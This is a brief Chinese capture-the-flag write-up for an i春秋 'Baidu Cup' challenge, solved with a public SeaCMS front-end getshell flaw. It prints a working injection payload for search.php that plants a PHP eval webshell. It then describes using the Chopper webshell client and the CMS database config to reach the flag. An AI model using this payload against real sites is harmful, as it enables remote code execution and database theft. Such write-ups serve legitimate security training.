题目在i春秋ctf训练营

又是一道cms的通用漏洞的题,直接去百度查看通用漏洞

这里我使用的是以下这个漏洞:

按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])

之后用菜刀连接,但乍一看并没有flag.php

“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

 

反手去查了一下海洋cms的数据库配置文件的存放地址:

“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

 

出去用菜刀连接数据库

“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

 

编辑完成后右键数据库管理,可以看到flag了

“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

相关文章:

  • 2021-05-08
  • 2021-09-05
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-09-23
  • 2021-11-03
  • 2021-06-21
  • 2021-11-16
  • 2021-10-27
相关资源
相似解决方案